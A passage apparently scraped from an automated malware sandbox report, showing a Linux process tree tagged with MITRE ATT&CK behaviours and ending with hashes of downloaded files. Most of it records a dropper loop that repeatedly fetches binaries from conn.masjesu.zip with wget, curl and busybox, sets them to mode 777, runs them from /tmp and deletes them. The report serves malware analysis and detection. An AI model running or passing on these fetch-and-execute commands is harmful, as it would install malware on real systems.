- File and Directory Permissions Modification
PID:951
-
-
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:957
-
-
/bin/chmodchmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵PID:971
-
-
/bin/chmodchmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:986
-
-
/bin/chmodchmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:994
-
-
/bin/chmodchmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:998
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- System Network Configuration Discovery
PID:999
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1000
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- System Network Configuration Discovery
PID:1002
-
-
/bin/chmodchmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:1010
-
-
/bin/chmodchmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:1017
-
-
/bin/chmodchmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:1020
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
16B
MD57689ca8c5bc85cf6b78ef89323d4df6a
SHA1a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA25617dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA51240f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471